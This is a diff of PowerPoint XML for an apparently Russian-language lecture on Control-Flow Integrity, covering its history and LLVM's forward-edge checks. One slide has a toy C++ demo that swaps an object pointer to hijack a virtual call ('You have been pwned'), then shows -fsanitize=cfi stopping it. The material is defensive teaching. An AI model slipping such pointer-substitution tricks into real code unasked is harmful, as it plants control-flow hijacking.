+              <a:t>  Evil *e = new Evil;</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>asm</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>("mov %1, %0" : "+r"(a) : "r"(e));</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>  a-&gt;foo();</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D87A8608-BF92-46CA-91C3-A6EC193EEF9E}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks/>
+          </p:cNvSpPr>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="6620435" y="1825625"/>
+            <a:ext cx="5192874" cy="4351338"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
+            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
+          </a:bodyPr>
+          <a:lstStyle>
+            <a:lvl1pPr marL="228600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="1000"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="2800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+            <a:lvl2pPr marL="685800" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="2400" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl2pPr>
+            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="2000" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl3pPr>
+            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl4pPr>
+            <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl5pPr>
+            <a:lvl6pPr marL="2514600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl6pPr>
+            <a:lvl7pPr marL="2971800" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl7pPr>
+            <a:lvl8pPr marL="3429000" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl8pPr>
+            <a:lvl9pPr marL="3886200" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:lnSpc>
+                <a:spcPct val="90000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPts val="500"/>
+              </a:spcBef>
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buChar char="•"/>
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl9pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>#</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> Подмена объекта</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>$ </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>clang++ repro.cc -O2</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>$ ./</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>a.out</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>You have been </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>pwned</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t># CFI </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>обнаруживает подмену</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>$ </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>clang++ -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fsanitize</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=cfi -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>flto</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fvisibility</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=hidden repro.cc -O2</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>$ ./</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>a.out</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>Illegal instruction</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -22972,7 +23646,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FBBCCBC-F667-4231-85BA-0357462E7F40}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3D8074F-0B8B-4203-BAE4-856705157EB1}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -22990,7 +23664,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Другие опции</a:t>
+              <a:t>История</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -22998,10 +23672,10 @@
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="3" name="Text Placeholder 2">
+          <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFF1E393-523C-4524-B32D-C3F28EF2422D}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{763C3A15-9242-4994-A39D-BD63D6DFA98A}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -23009,22 +23683,231 @@
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
           <p:nvPr>
-            <p:ph type="body" idx="1"/>
+            <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="890258" y="1798730"/>
+            <a:ext cx="10411485" cy="4351338"/>
+          </a:xfrm>
+        </p:spPr>
         <p:txBody>
-          <a:bodyPr/>
+          <a:bodyPr>
+            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
+          </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:endParaRPr lang="en-US"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CFI </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>это </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>generic-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>термин для любых нарушений исходного </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>control-flow </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>программы</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>В широком смысле </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Stack Protector </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Shadow Stack – </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>тоже </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CFI</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Впервые введён </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Abadi et al. </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>в 2005 (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>https://mihaibudiu.github.io/work/ccs05.pdf)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Два типа:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>forward-edge (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>проверка </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>call/jump)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>backward-edge (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>проверка </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>ret)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Множество различных методик в статьях</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Обычно под </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CFI </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>понимают один из методов</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LLVM CFI, 2015 (2015, Clang 3.7)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Microsoft Control Flow Guard</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, 2014</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>grsecurity</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t> RAP</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>, 2016</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Аппаратные методы</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: Intel CET, 2020 (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>спецификация 2016)</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>AArch64 BTI/PAC (2018)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1762390909"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3742136983"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -23056,7 +23939,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6713E613-45DE-4720-BCF2-4F99AC6FFAD0}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AB7168C-DC4C-48D2-BF20-F5AE318F93A4}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -23073,12 +23956,8 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Что дальше </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>?</a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LLVM CFI</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -23088,7 +23967,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF6B1F09-94BF-48D9-B780-866C5F1B0092}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDD315F3-A9A3-4DC6-9186-9A29A7C570EA}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -23101,300 +23980,90 @@
         </p:nvSpPr>
         <p:spPr/>
         <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
-          </a:bodyPr>
+          <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>О некоторых опциях мы не успели поговорить</a:t>
+              <a:t>Компиляторная инструментация</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>forward-edge </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>проверок</a:t>
+            </a:r>
+          </a:p>
